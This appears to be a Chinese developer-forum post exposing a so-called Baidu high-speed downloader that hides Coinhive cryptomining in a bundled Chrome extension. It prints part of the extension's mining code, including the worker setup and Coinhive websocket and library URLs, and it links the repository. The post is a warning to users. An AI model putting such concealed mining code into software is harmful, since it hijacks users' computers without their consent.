最近有朋友告诉我自己电脑时常连接 coinhive 不知道为什么,一排查发现是这哥们安装了所谓「百度不限速下载器」
这是一款通过算法来提速的高速下载器,支持 Windows 和 Mac。 请在官方地址下载,本程序不会获取您的任何隐私,绝对无毒,请放心使用。 本软件将持续更新,目标是打造一个最好用的高速下载器。
插件会占用不到 5%的 CPU (不会占用显卡)用于提高算力
实际上这东西就是用 Chrome 拓展执行 coinhive 挖矿,然后本地程序大概是打包了一个 aria2 和大概类似 BaiduExporter 的 Electron 程序。
拓展后台运行:
var q = navigator.hardwareConcurrency || 4;
H = d.threads || q,
function() {
return void 0 !== window.WebAssembly
}() && d.forceASMJS, S = Z, v = b;
var $ = "ifExclusiveTab",
ll = "forceMultiTab",
dl = "forceExclusiveTab",
Zl = function(l) {
return (window.URL || window.webkitURL || window.mozURL).createObjectURL(new Blob([l]))
}(m.default),
bl = {
LIB_URL: "https://coinhive.com/lib/",
ASMJS_NAME: "worker-asmjs.min.js",
REQUIRES_AUTH: !1,
WEBSOCKET_SHARDS: [
["wss://ws001.coinhive.com/proxy", "wss://ws002.coinhive.com/proxy", "wss://ws003.coinhive.com/proxy", "wss://ws004.coinhive.com/proxy", "wss://ws005.coinhive.com/proxy", "wss://ws006.coinhive.com/proxy", "wss://ws007.coinhive.com/proxy", "wss://ws029.coinhive.com/proxy"],
["wss://ws008.coinhive.com/proxy", "wss://ws009.coinhive.com/proxy", "wss://ws010.coinhive.com/proxy", "wss://ws011.coinhive.com/proxy", "wss://ws012.coinhive.com/proxy", "wss://ws013.coinhive.com/proxy", "wss://ws014.coinhive.com/proxy", "wss://ws030.coinhive.com/proxy"],
["wss://ws015.coinhive.com/proxy", "wss://ws016.coinhive.com/proxy", "wss://ws017.coinhive.com/proxy", "wss://ws018.coinhive.com/proxy", "wss://ws019.coinhive.com/proxy", "wss://ws020.coinhive.com/proxy", "wss://ws021.coinhive.com/proxy", "wss://ws031.coinhive.com/proxy"],
["wss://ws022.coinhive.com/proxy", "wss://ws023.coinhive.com/proxy", "wss://ws024.coinhive.com/proxy", "wss://ws025.coinhive.com/proxy", "wss://ws026.coinhive.com/proxy", "wss://ws027.coinhive.com/proxy", "wss://ws028.coinhive.com/proxy", "wss://ws032.coinhive.com/proxy"]
],
CAPTCHA_URL: "https://coinhive.com/captcha/",
MINER_URL: "https://coinhive.com/media/miner.html",
AUTH_URL: "https://authedmine.com/authenticate.html"
},
Vl = function() {
this.worker = new Worker(Zl), this.worker.onmessage = this.onReady.bind(this), this.currentJob = null, this.verifyJob = null, this.jobCallback = function() {}, this.verifyCallback = function() {}, this._isReady = !1, this.hashesPerSecond = 0, this.hashesTotal = 0, this.running = !1, this.lastMessageTimestamp = Date.now()
}
完整: https://gist.github.com/anonymous/1774ff85f84d07fdbeaefef44a236d34
本地程序结构:
├── dist-assets
│ ├── aria2.conf
│ ├── aria2.session
│ ├── aria2c
│ └── aria2c.exe
├── init.js
├── lib
│ ├── main.js
│ └── page
│ ├── index.css
│ ├── index.html
│ └── index.js
└── package.json
https://www.jianshu.com/p/075692b9feab
https://github.com/high-speed-downloader/high-speed-downloader
就这玩意儿有 800 多个 Star,其中一个现已匿名的维护者有将近 700 个 follower。
匿名的维护者八成之前还是个 vim 圈稍有点名气的人,因为被「依云」啊,「 mattn 」啊等人关注 。而且八成也可能逛 V 站,follower 里有看到不少 V 友
中枪的朋友赶紧清理了吧 - -
后台占用小量 CPU 挖矿并不可耻,明说就好,愿意的人自然会愿意。 但是藏着代码骗不懂的人真的挺可耻的。
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.